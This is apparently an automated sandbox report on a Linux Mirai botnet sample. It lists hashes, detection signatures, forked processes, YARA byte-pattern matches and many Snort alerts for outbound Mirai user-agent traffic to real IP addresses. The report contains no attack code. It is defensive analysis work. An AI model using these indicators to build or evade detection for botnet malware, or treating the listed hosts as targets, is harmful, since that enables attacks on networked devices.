Edit tour

Linux Analysis Report
qynd1m1ejo.elf

Overview

General Information

Sample name:	qynd1m1ejo.elf renamed because original name is a hash value
Original sample name:	bfedf409bceee1b2a8c3da0564b28cf0.elf
Analysis ID:	1398405
MD5:	bfedf409bceee1b2a8c3da0564b28cf0
SHA1:	73f29df6f52c6815eb662cde6ed8cac22e602363
SHA256:	337fa7c27a8932368a18f050c559c543d8e4e7d2d7a0a6a1703d744b3c5e1b8e
Tags:	32elfintelmirai
Infos:

Detection

Mirai

Score:	100
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Detected Mirai

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mirai

Machine Learning detection for sample

Sample tries to kill multiple processes (SIGKILL)

Uses known network protocols on non-standard ports

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample tries to kill a process (SIGKILL)

Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1398405
Start date and time:	2024-02-25 19:01:00 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	qynd1m1ejo.elf renamed because original name is a hash value
Original Sample Name:	bfedf409bceee1b2a8c3da0564b28cf0.elf
Detection:	MAL
Classification:	mal100.spre.troj.linELF@0/0@2/0

Warnings

Report size exceeded maximum capacity and may have missing network information.

Runtime Messages

Command:	/tmp/qynd1m1ejo.elf
PID:	5880
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	Infected By Cult
Standard Error:

Process Tree

system is lnxubuntu20

qynd1m1ejo.elf (PID: 5880, Parent: 5803, MD5: bfedf409bceee1b2a8c3da0564b28cf0) Arguments: /tmp/qynd1m1ejo.elf

qynd1m1ejo.elf New Fork (PID: 5881, Parent: 5880)

qynd1m1ejo.elf New Fork (PID: 5882, Parent: 5880)

qynd1m1ejo.elf New Fork (PID: 5883, Parent: 5880)

qynd1m1ejo.elf New Fork (PID: 5884, Parent: 5883)

qynd1m1ejo.elf New Fork (PID: 5885, Parent: 5883)

qynd1m1ejo.elf New Fork (PID: 5886, Parent: 5883)

qynd1m1ejo.elf New Fork (PID: 5888, Parent: 5883)

qynd1m1ejo.elf New Fork (PID: 5889, Parent: 5883)

qynd1m1ejo.elf New Fork (PID: 5890, Parent: 5883)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Mirai	Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.	No Attribution	http://osint.bambenekconsulting.com/feeds/ http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/ https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html https://blog.netlab.360.com/another-lilin-dvr-0-day-being-used-to-spread-mirai-en/ https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
qynd1m1ejo.elf	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x58b0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
qynd1m1ejo.elf	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xa712:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
qynd1m1ejo.elf	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x192:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
qynd1m1ejo.elf	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xd21d:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
qynd1m1ejo.elf	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xbd09:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
qynd1m1ejo.elf	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xa6e2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
Click to see the 1 entries

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Mirai_12	Yara detected Mirai	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
5880.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x58b0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
5880.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xa712:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
5880.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x192:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
5880.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xd21d:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
5880.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xbd09:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
5880.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xa6e2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
5889.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x58b0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
5889.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xa712:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
5889.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x192:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
5889.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xd21d:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
5889.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xbd09:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
5889.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xa6e2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
5882.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_b14f4c5d	unknown	unknown	0x58b0:$a: 53 31 DB 8B 4C 24 0C 8B 54 24 08 83 F9 01 76 15 66 8B 02 83 E9 02 25 FF FF 00 00 83 C2 02 01 C3 83 F9 01 77 EB 49 75 05 0F BE 02 01 C3
5882.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_88de437f	unknown	unknown	0xa712:$a: 24 08 8B 4C 24 04 85 D2 74 0D 31 C0 89 F6 C6 04 08 00 40 39 D0
5882.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_ae9d0fa6	unknown	unknown	0x192:$a: 83 EC 04 8A 44 24 18 8B 5C 24 14 88 44 24 03 8A 44 24 10 25 FF 00
5882.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_389ee3e9	unknown	unknown	0xd21d:$a: 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83
5882.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_cc93863b	unknown	unknown	0xbd09:$a: C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08
5882.1.0000000008048000.0000000008057000.r-x.sdmp	Linux_Trojan_Mirai_8aa7b5d3	unknown	unknown	0xa6e2:$a: 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88
Click to see the 13 entries

Snort Signatures

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.68.32.7

Timestamp:	02/25/24-19:02:54.981478
SID:	2839471
Source Port:	42138
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.196.22.241

Timestamp:	02/25/24-19:02:29.250092
SID:	2839471
Source Port:	49994
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.211.52.84

Timestamp:	02/25/24-19:03:00.998425
SID:	2839471
Source Port:	35404
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.85.252.35

Timestamp:	02/25/24-19:03:13.112715
SID:	2839471
Source Port:	56542
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.213.98.172

Timestamp:	02/25/24-19:02:57.959014
SID:	2839471
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.58.131

Timestamp:	02/25/24-19:03:25.916277
SID:	2839471
Source Port:	60470
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.62.203

Timestamp:	02/25/24-19:03:28.348823
SID:	2839471
Source Port:	40656
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.64.137.209

Timestamp:	02/25/24-19:03:21.335052
SID:	2839471
Source Port:	37982
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.128.110.146

Timestamp:	02/25/24-19:03:12.601505
SID:	2839471
Source Port:	33990
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.99.236.140

Timestamp:	02/25/24-19:03:17.526994
SID:	2839471
Source Port:	53198
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.52.78.184

Timestamp:	02/25/24-19:02:54.970496
SID:	2839471
Source Port:	40512
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.237.182

Timestamp:	02/25/24-19:03:05.279017
SID:	2839471
Source Port:	43302
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.61.35

Timestamp:	02/25/24-19:03:17.527037
SID:	2839471
Source Port:	59920
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.175.14.4

Timestamp:	02/25/24-19:03:23.219912
SID:	2839471
Source Port:	38396
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.29.212.224

Timestamp:	02/25/24-19:02:49.724817
SID:	2839471
Source Port:	38660
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.232.57

Timestamp:	02/25/24-19:03:24.197630
SID:	2839471
Source Port:	59080
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.231.150

Timestamp:	02/25/24-19:03:08.210417
SID:	2839471
Source Port:	56404
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.140.185.145

Timestamp:	02/25/24-19:03:09.992140
SID:	2839471
Source Port:	51440
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.143.7

Timestamp:	02/25/24-19:02:21.771110
SID:	2839471
Source Port:	40610
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.214.188

Timestamp:	02/25/24-19:02:42.444967
SID:	2839471
Source Port:	38500
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.31.76.241

Timestamp:	02/25/24-19:02:54.122364
SID:	2839471
Source Port:	40042
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.124.57.246

Timestamp:	02/25/24-19:03:31.844451
SID:	2839471
Source Port:	56412
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.162.237.145

Timestamp:	02/25/24-19:03:03.012383
SID:	2839471
Source Port:	50362
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.171.28

Timestamp:	02/25/24-19:02:50.289330
SID:	2839471
Source Port:	33250
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.48.180.191

Timestamp:	02/25/24-19:02:58.029079
SID:	2839471
Source Port:	35766
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.173.162.44

Timestamp:	02/25/24-19:03:34.370742
SID:	2839471
Source Port:	41530
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.31.250.19

Timestamp:	02/25/24-19:02:28.813885
SID:	2839471
Source Port:	47156
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.231.150

Timestamp:	02/25/24-19:03:01.117044
SID:	2839471
Source Port:	56296
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.163.41.248

Timestamp:	02/25/24-19:02:45.198155
SID:	2839471
Source Port:	55148
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.28.225

Timestamp:	02/25/24-19:02:50.284027
SID:	2839471
Source Port:	42514
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.164.195.191

Timestamp:	02/25/24-19:02:54.220900
SID:	2839471
Source Port:	60552
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.80.145.157

Timestamp:	02/25/24-19:03:30.535840
SID:	2839471
Source Port:	44842
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.68.189

Timestamp:	02/25/24-19:02:36.331487
SID:	2839471
Source Port:	43394
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.184.176.83

Timestamp:	02/25/24-19:03:09.151421
SID:	2839471
Source Port:	55078
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.35.28.9

Timestamp:	02/25/24-19:03:34.715901
SID:	2839471
Source Port:	38844
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.0.243.228

Timestamp:	02/25/24-19:03:22.761541
SID:	2839471
Source Port:	35496
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.168.253.81

Timestamp:	02/25/24-19:03:36.163227
SID:	2839471
Source Port:	40154
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.0.0.250

Timestamp:	02/25/24-19:03:04.936111
SID:	2839471
Source Port:	55942
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.48.155.162

Timestamp:	02/25/24-19:03:36.011255
SID:	2839471
Source Port:	57700
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.56.81.125

Timestamp:	02/25/24-19:02:19.154983
SID:	2839471
Source Port:	40882
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.214.188

Timestamp:	02/25/24-19:02:42.364341
SID:	2839471
Source Port:	38480
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.46.16

Timestamp:	02/25/24-19:03:12.996842
SID:	2839471
Source Port:	55752
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.111.243.40

Timestamp:	02/25/24-19:03:34.335755
SID:	2839471
Source Port:	49938
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.119.169.103

Timestamp:	02/25/24-19:02:50.085136
SID:	2839471
Source Port:	52596
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.165.191

Timestamp:	02/25/24-19:02:21.694521
SID:	2839471
Source Port:	57128
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.110.222.87

Timestamp:	02/25/24-19:02:42.645187
SID:	2839471
Source Port:	50230
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.65.89.22

Timestamp:	02/25/24-19:03:15.119234
SID:	2839471
Source Port:	44744
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.20.68

Timestamp:	02/25/24-19:03:01.244868
SID:	2839471
Source Port:	51920
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.164.197.80

Timestamp:	02/25/24-19:02:57.345774
SID:	2839471
Source Port:	43694
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.86.87.72

Timestamp:	02/25/24-19:02:36.941339
SID:	2839471
Source Port:	56020
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.84.209.239

Timestamp:	02/25/24-19:02:21.732094
SID:	2839471
Source Port:	50106
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.65.171.122

Timestamp:	02/25/24-19:02:31.338613
SID:	2839471
Source Port:	58600
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.209.133.80

Timestamp:	02/25/24-19:02:57.975095
SID:	2839471
Source Port:	47120
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.90.146.125

Timestamp:	02/25/24-19:02:19.285110
SID:	2839471
Source Port:	47292
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.53.246.135

Timestamp:	02/25/24-19:03:26.147582
SID:	2839471
Source Port:	56572
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.64.108

Timestamp:	02/25/24-19:03:08.884703
SID:	2839471
Source Port:	51070
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.213.202.26

Timestamp:	02/25/24-19:02:27.181137
SID:	2839471
Source Port:	54048
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.31.148.231

Timestamp:	02/25/24-19:02:46.937025
SID:	2839471
Source Port:	45732
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.99.210.141

Timestamp:	02/25/24-19:02:36.526850
SID:	2839471
Source Port:	39322
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.144.131.146

Timestamp:	02/25/24-19:03:04.896217
SID:	2839471
Source Port:	36982
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.216.195.75

Timestamp:	02/25/24-19:02:57.443364
SID:	2839471
Source Port:	50410
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.208.215.191

Timestamp:	02/25/24-19:02:40.985314
SID:	2839471
Source Port:	54920
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.13.96.73

Timestamp:	02/25/24-19:02:28.839599
SID:	2839471
Source Port:	45318
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.49.14

Timestamp:	02/25/24-19:02:54.452491
SID:	2839471
Source Port:	59322
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.163.47

Timestamp:	02/25/24-19:03:34.342088
SID:	2839471
Source Port:	51168
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.221.17.173

Timestamp:	02/25/24-19:03:24.414046
SID:	2839471
Source Port:	49268
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.86.72.116

Timestamp:	02/25/24-19:02:19.121187
SID:	2839471
Source Port:	58466
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.169.192.197

Timestamp:	02/25/24-19:03:26.048339
SID:	2839471
Source Port:	33262
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.215.240.138

Timestamp:	02/25/24-19:02:27.201206
SID:	2839471
Source Port:	50474
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.168.70.180

Timestamp:	02/25/24-19:02:44.906970
SID:	2839471
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.101.232.57

Timestamp:	02/25/24-19:03:22.821231
SID:	2839471
Source Port:	59054
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.217.145.162

Timestamp:	02/25/24-19:02:19.082096
SID:	2839471
Source Port:	48418
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.85.15.8

Timestamp:	02/25/24-19:03:00.993849
SID:	2839471
Source Port:	35820
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.214.239.215

Timestamp:	02/25/24-19:02:37.449418
SID:	2839471
Source Port:	46112
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 88.96.218.158

Timestamp:	02/25/24-19:03:21.315304
SID:	2839471
Source Port:	53098
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 112.197.41.86

Timestamp:	02/25/24-19:02:43.221586
SID:	2839471
Source Port:	39104
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.15 - Destination IP: 95.100.51.55

